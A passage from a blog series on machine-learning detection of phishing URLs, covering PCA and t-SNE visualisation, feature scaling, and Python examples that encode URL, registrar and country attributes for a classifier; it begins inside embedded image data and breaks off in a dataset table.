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" /></div>
</div>
<div>
<div style="text-align: center;">
<i>Figure 2.</i> Visualization of URLs in the two-dimensional space after applying the PCA technique with <i>Lifetime_new := Lifetime * 100</i> (phishing links - orange dots, benign links - blue dots).</div>
<div>
<br /></div>
</div>
<div>
In practice, when features have different scales, it is recommended to normalize them so that they end up on a similar scale. In the simplest case we can divide a feature value by its maximum or by its range, but the more popular techniques are <i>min-max</i> and <i>mean normalization</i> (see <a href="https://en.wikipedia.org/wiki/Feature_scaling">Feature scaling</a> for more methods).</div>
<div>
<div>
<br />
After min-max feature normalization, we'll obtain the following picture.<br />
<ul style="text-align: left;">
<li><i>Component 1</i>: -0.348 x Registrar_code + 0.271 x Lifetime + 0.069 x Country_code + <b>0.895 x Protocol_code</b></li>
<li><i>Component 2</i>: -0.258 x Registrar_code + 0.020 x Lifetime + <b>-0.965 x Country_code</b> + -0.032 x Protocol_code </li>
</ul>
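<div>
To make the effect of scaling concrete, here is an added example (my own code, not the post's or the lab repository's) that applies min-max and mean normalization and then a small pure-Python PCA to a constructed set of eight URL feature vectors with the same four attributes. The rows, the lifetime measured in days, the power-iteration PCA and the helper names are all assumptions of this example; what it shows is that without scaling the <i>Lifetime</i> column swallows the first component (the same effect the post provoked with <i>Lifetime * 100</i>), while after min-max scaling the loadings become comparable and <i>Protocol_code</i> comes out on top.</div>

```python
"""Feature scaling before PCA on URL attributes (pure Python, no numpy).

Added example, not code from the post or its GitHub repository. The eight
rows below are constructed: they only mimic the four attributes used in the
post (Registrar_code, Lifetime, Country_code, Protocol_code).
"""
from typing import Dict, List, Sequence

FEATURES = ["Registrar_code", "Lifetime", "Country_code", "Protocol_code"]

# Constructed rows: Lifetime in days, Protocol_code 0 = http, 1 = https.
# The first four mimic phishing links (short-lived, plain HTTP), the last
# four benign ones (long registration, HTTPS).
RAW_DATA: List[List[float]] = [
    [0, 365, 0, 0],
    [0, 400, 1, 0],
    [1, 365, 0, 0],
    [2, 730, 2, 0],
    [3, 5110, 1, 1],
    [4, 5840, 0, 1],
    [3, 4380, 2, 1],
    [5, 6205, 1, 1],
]


def _columns(rows: Sequence[Sequence[float]]) -> List[List[float]]:
    return [list(c) for c in zip(*rows)]


def min_max_scale(rows: Sequence[Sequence[float]]) -> List[List[float]]:
    """Rescale every column to [0, 1]; a constant column becomes all zeros."""
    cols = _columns(rows)
    lo = [min(c) for c in cols]
    hi = [max(c) for c in cols]
    return [[(v - l) / (h - l) if h != l else 0.0
             for v, l, h in zip(row, lo, hi)] for row in rows]


def mean_normalize(rows: Sequence[Sequence[float]]) -> List[List[float]]:
    """Centre each column on its mean and divide by its range."""
    cols = _columns(rows)
    mean = [sum(c) / len(c) for c in cols]
    rng = [max(c) - min(c) for c in cols]
    return [[(v - m) / r if r != 0 else 0.0
             for v, m, r in zip(row, mean, rng)] for row in rows]


def covariance(rows: Sequence[Sequence[float]]) -> List[List[float]]:
    """Sample covariance matrix of the columns."""
    n, d = len(rows), len(rows[0])
    mean = [sum(r[j] for r in rows) / n for j in range(d)]
    cov = [[0.0] * d for _ in range(d)]
    for r in rows:
        for i in range(d):
            for j in range(d):
                cov[i][j] += (r[i] - mean[i]) * (r[j] - mean[j])
    return [[c / (n - 1) for c in row] for row in cov]


def top_eigenpairs(matrix: List[List[float]], k: int = 2, iters: int = 1000):
    """Power iteration with deflation; adequate for a small symmetric PSD matrix."""
    d = len(matrix)
    m = [row[:] for row in matrix]
    pairs = []
    for _ in range(k):
        v = [1.0] * d
        for _ in range(iters):
            w = [sum(m[i][j] * v[j] for j in range(d)) for i in range(d)]
            norm = sum(x * x for x in w) ** 0.5
            if norm == 0.0:
                break
            v = [x / norm for x in w]
        lam = sum(v[i] * sum(m[i][j] * v[j] for j in range(d)) for i in range(d))
        pairs.append((lam, v))
        for i in range(d):  # deflate so the next pass finds the next eigenvector
            for j in range(d):
                m[i][j] -= lam * v[i] * v[j]
    return pairs


def pca(rows: Sequence[Sequence[float]], k: int = 2) -> List[Dict]:
    """Top-k components as {explained variance ratio, loadings per feature}."""
    cov = covariance(rows)
    total = sum(cov[i][i] for i in range(len(cov)))
    return [{"explained": lam / total, "loadings": dict(zip(FEATURES, vec))}
            for lam, vec in top_eigenpairs(cov, k)]


def dominant_feature(component: Dict) -> str:
    """Feature with the largest absolute loading in a component."""
    return max(component["loadings"], key=lambda f: abs(component["loadings"][f]))


def describe(component: Dict) -> str:
    terms = " + ".join(f"{w:.3f} x {f}" for f, w in component["loadings"].items())
    return f"{terms}   (explains {component['explained']:.1%} of variance)"


if __name__ == "__main__":
    for name, data in [("raw", RAW_DATA), ("min-max", min_max_scale(RAW_DATA)),
                       ("mean-normalized", mean_normalize(RAW_DATA))]:
        print(f"--- {name} ---")
        for i, comp in enumerate(pca(data), 1):
            print(f"Component {i}: {describe(comp)}")
```

<div>
Running the script prints the two leading components for the raw, min-max scaled and mean-normalized data. On the raw rows the first component is essentially the <i>Lifetime</i> axis and explains almost all of the variance, which is why the unscaled scatter plot is hard to read; after scaling the protocol, lifetime and registrar codes share the first component and the country code falls into the second, as in the loadings listed above.</div>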
</div>
<div>
<div style="text-align: center;">
<img src="data:image/png;base64,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" /></div>
<div style="text-align: center;">
<i>Figure 3.</i> Visualization of URLs in the two-dimensional space after applying the PCA technique with <i>min-max feature normalization</i> (phishing links - orange dots, benign links - blue dots).</div>
<br /></div>
<div>
Let's try another algorithm, T-distributed Stochastic Neighbor Embedding (<a href="https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding">t-SNE</a>), a non-linear technique for reducing the dimension of the data, again both with and without feature scaling.</div>
</div>
<div>
<br /></div>
<div style="text-align: center;">
<img src="https://s.dou.ua/storage-files/image1_44vDkzo.png" /></div>
<div>
<br /></div>
<div>
<div style="text-align: center;">
<i>Figure 4. </i>Visualization of URLs in the two-dimensional space after applying the t-SNE technique (phishing links - orange dots, benign links - blue dots).<br />
<br />
<i><br /></i>
<img src="data:image/png;base64,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" /><br />
<i>Figure 5. </i>Visualization of URLs in the two-dimensional space after applying the t-SNE technique with <i>min-max feature normalization</i> (phishing links - orange dots, benign links - blue dots).</div>
<div style="text-align: center;">
<br /></div>
<div>
In all the cases, the links tend to fall into two classes, and feature scaling makes the separation clearer. This confirms that there are attributes, or combinations of them, whose values can be used to separate the objects into the two classes.</div>
</div>
<div>
<br /></div>
In the next post, we'll try to apply the cluster analysis to this problem.<br />
If you want to play with the model, the source code is available on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/Courses/ML%20in%20Cybersecurity/Classification/Phishing%20detection">Github</a>.<br />
<br />
To be continued...<br />
<div>
<br /></div>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-37612545790281023892020-03-16T14:17:00.002-07:002020-10-30T11:37:33.741-07:00AI and Cybersecurity. Part 2 - Detecting Phishing URLs with ML<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<img alt="hack fraud card code computer credit crime cyber data hacker identity information internet password phishing pile privacy protection safety secure spy steal technology thief green cartoon text product line font illustration human behavior angle clip art graphics computer wallpaper" height="427" src="https://c.pxhere.com/images/66/ab/1a22a11f23f4a32d21b10fcd0164-1449185.jpg!d" width="640" /></div>
<br />
In <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-1.html">Part 1</a>, we got acquainted with the AI paradigms and the main ML approaches: supervised, unsupervised, and reinforcement learning. Even though the unsupervised approach looks more attractive, since you do not need to pre-label the data for training, supervised learning can be seen as a more precise instrument for detecting malicious objects such as phishing URLs once we have enough labeled data.<br />
<div>
<a name='more'></a><b><br /></b>
<b>Supervised Detection of Phishing</b><br />
<b><br /></b>
The first good thing about phishing is that we can use a database of validated phishing links at Phishtank.org, where antivirus companies and individual researchers upload new phishing links, which are then validated. Benign URLs are also easy to find with Alexa.com, which keeps track of popular websites.<br />
<br />
Second, the variety of techniques for launching phishing webpages is limited by the capabilities of the hosting provider and the domain name registrar, and little has changed over the past 15–20 years, except that certificates have come into wider use. Attackers still register domain names that resemble the attacked service for the shortest possible period, typically one year. The webpage is hosted locally, or a hacked server is used. Most attacks use plain HTTP without TLS or a certificate. Thus, it is enough to take into consideration the following attributes: the domain name, WhoIs data, geolocation, the type of network protocol (HTTP or HTTPS) and, optionally, the presence of a certificate and its parameters.<br />
<br />
We will need a binary classifier to detect phishing URLs. The heavy apparatus of deep neural networks (DNN), which requires a large amount of data and computing power for high-quality training, is not needed for such a basic task. It is enough to use traditional classification methods such as discriminant analysis, support vector machines (SVM), decision trees, random forests, or even regression analysis to predict a threat score, if you decide you want a threat scoring function rather than a hard label.<br />
<br />
Consider the task of detecting phishing links based on the following attributes: the domain registrar, the domain registration period, the geolocation of the hosting server, and the presence of a secure connection with a valid certificate. I give this problem to my students as a laboratory assignment. First, they need to create a training dataset, using the Phishtank.com resource as a source of classified phishing links.<br />
<br />
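<div>
As an added illustration (my own code, not the lab's or the repository's), the following Python script turns records shaped like Table 1 into the numeric feature vectors a classifier consumes: it re-fangs the <i>[http://]</i> notation used in the table, maps the scheme to a protocol code, and assigns stable integer codes to registrars and countries after normalizing their spelling. The records, the example.com/.net/.org hosts, the lifetime values and the helper names are constructed for this example; in the lab the registrar, lifetime and country come from WhoIs and geolocation lookups.</div>

```python
"""Turning Table 1 style records into numeric feature vectors.

Added example, not the post's or the lab repository's own code. The records
are constructed (example.com/.net/.org hosts); in the lab the registrar,
lifetime and country fields would come from WhoIs and geolocation lookups.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

FEATURE_NAMES = ["Registrar_code", "Lifetime", "Country_code", "Protocol_code"]
LABELS = {"benign": 0, "phishing": 1}

# Constructed records in the shape of Table 1; Lifetime = registration period in years.
RECORDS = [
    {"url": "[http://]login.example.com/verify", "registrar": "godaddy",
     "lifetime": 1, "country": "US", "class": "phishing"},
    {"url": "hxxp://secure-update.example.net/", "registrar": "GoDaddy",
     "lifetime": 1, "country": "us", "class": "phishing"},
    {"url": "http://accounts.example.net/apple", "registrar": "namecheap",
     "lifetime": 2, "country": "UK", "class": "phishing"},
    {"url": "https://www.example.org/", "registrar": "SE Direkt",
     "lifetime": 14, "country": "SE", "class": "benign"},
    {"url": "https://example.com", "registrar": "MarkMonitor Inc.",
     "lifetime": 16, "country": "US", "class": "benign"},
    {"url": "docs.example.org/share/", "registrar": "godaddy",  # no scheme at all
     "lifetime": 1, "country": "US", "class": "phishing"},
]


def refang(url: str) -> str:
    """Undo the [http://] notation of Table 1 and the hxxp convention."""
    url = re.sub(r"^\[(\w+://)\]", r"\1", url.strip())
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def protocol_code(url: str) -> int:
    """0 for http, 1 for https; a bare host is assumed to be reached over plain HTTP."""
    scheme = urlsplit(refang(url)).scheme.lower()
    if scheme in ("", "http"):
        return 0
    if scheme == "https":
        return 1
    raise ValueError(f"unsupported scheme in {url!r}: {scheme}")


class CategoryEncoder:
    """Assigns stable integer codes to registrar / country strings.

    Spelling is normalised first, so 'GoDaddy' and 'godaddy', or
    'MARKMONITOR INC.' and 'MarkMonitor Inc.', share one code.
    """

    def __init__(self) -> None:
        self.codes: Dict[str, int] = {}

    def encode(self, value: str) -> int:
        key = re.sub(r"[^a-z0-9]", "", value.lower())
        if key not in self.codes:
            self.codes[key] = len(self.codes)
        return self.codes[key]


def build_dataset(records) -> Tuple[List[List[int]], List[int]]:
    """Return (X, y): feature rows in FEATURE_NAMES order and 0/1 labels."""
    registrars, countries = CategoryEncoder(), CategoryEncoder()
    X: List[List[int]] = []
    y: List[int] = []
    for rec in records:
        if rec["class"] not in LABELS:
            raise ValueError(f"unknown class label: {rec['class']!r}")
        X.append([registrars.encode(rec["registrar"]),
                  int(rec["lifetime"]),
                  countries.encode(rec["country"]),
                  protocol_code(rec["url"])])
        y.append(LABELS[rec["class"]])
    return X, y


if __name__ == "__main__":
    X, y = build_dataset(RECORDS)
    print("\t".join(FEATURE_NAMES + ["Class"]))
    for row, label in zip(X, y):
        print("\t".join(str(v) for v in row + [label]))
```

<div>
The encoder deliberately normalizes case and punctuation before assigning a code; otherwise "godaddy" and "GoDaddy" would look like two different registrars to the model and the registrar attribute would lose most of its value. Any scheme other than http or https is rejected rather than silently coded, so a malformed record surfaces while the dataset is being built instead of during training.</div>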
<i>Table 1.</i> An example of a dataset with URL attributes and class labels.<br />
<table class="bordered" style="background-color: white; border-collapse: collapse; border: 0px; color: #0d0d0d; font-family: "Pt Sans", Arial, sans-serif; font-size: 15px; list-style: none; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: top; width: auto;"><tbody style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">
<tr style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 60px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 60px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">#</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 150px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 260.667px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">URL</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 100px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 100px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">IP address</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 100px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 100px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Registrar</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 60px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 
60px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Lifetime</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 60px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 60px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Country</strong></td><td style="background: rgb(224, 248, 241); border-collapse: collapse; border: 1px solid rgb(204, 204, 204); color: #333333; font-size: 16px; line-height: 1.3; list-style: none; margin: 0px; min-width: 100px; outline: 0px; padding: 10px; text-align: center; vertical-align: top; width: 100px;"><strong style="border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;">Class</strong></td></tr>
